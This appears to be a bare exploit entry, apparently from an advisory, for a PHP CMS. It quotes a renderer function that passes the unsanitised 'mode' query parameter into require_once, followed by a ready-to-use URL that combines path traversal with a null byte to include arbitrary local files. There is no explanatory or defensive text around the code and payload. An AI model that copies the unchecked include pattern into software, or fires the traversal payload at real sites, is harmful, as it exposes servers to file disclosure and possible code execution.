function renderer($mode='frontend'){ require_once(CORE . "/class.{$mode}.php"); return ($mode == 'administration' ? Administration::instance() : Frontend::instance()); } $renderer = (isset($_GET['mode']) ? strtolower($_GET['mode']) : 'frontend'); $output = renderer($renderer)->display(getCurrentPage());
http://[host]/[path]/index.php?mode=/../../../../../../[local_file]%00